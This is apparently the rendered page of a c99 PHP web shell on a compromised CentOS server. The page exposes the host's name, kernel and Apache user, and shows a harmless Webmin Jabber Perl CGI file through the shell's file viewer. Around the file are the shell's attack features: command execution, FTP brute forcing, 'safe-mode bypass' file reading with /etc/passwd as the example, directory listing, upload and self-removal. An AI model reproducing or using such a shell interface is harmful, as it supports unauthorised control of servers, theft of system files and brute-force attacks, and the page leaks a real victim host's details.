!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/jabber/   drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     save_messages.cgi (1.29 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# save_messages.cgi
# Save welcome and other messages

require './jabber-lib.pl';
&ReadParse();
&error_setup($text{'messages_err'});

$conf = &get_jabber_config();
$session = &find_by_tag("service", "id", "sessions", $conf);
$jsm = &find("jsm", $session);
$welcome = &find("welcome", $jsm);
$register = &find("register", $jsm);
$vcard = &find("vcard", $jsm);

# Validate and store inputs
&save_directive($welcome, "subject",
        [ [ "subject", [ { }, 0, $in{'wsubject'} ] ] ] );
&save_directive($welcome, "body",
        [ [ "body", [ { }, 0, $in{'wbody'} ] ] ] );
eval {
    $xml = new XML::Parser('Style' => 'Tree');
    $in{'vcard'} =~ s/\r//g;
    $vcxml = $xml->parse($in{'vcard'});
    };
$register->[1]->[0]->{'notify'} = $in{'rnotify'} ? 'yes' : 'no';
&save_directive($register, "instructions",
        [ [ "instructions", [ { }, 0, $in{'rinstr'} ] ] ] );
foreach $f (@register_fields) {
    if ($in{"rfield_$f"}) {
        &save_directive($register, $f, [ [ $f, [ { } ] ] ] );
        }
    else {
        &save_directive($register, $f);
        }
    }
&error(&text('messages_evcard', $@)) if ($@);
&error($text{'messages_etag'}) if (lc($vcxml->[0]) ne 'vcard');
&save_directive($jsm, [ $vcard ], [ $vcxml ]);
&save_directive($jsm, "vcard2jud",
        $in{'vcard2jud'} ? [ [ 'vcard2jud', [ { } ] ] ] : [ ] );

&save_jabber_config($conf);
&redirect("");


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0051 ]--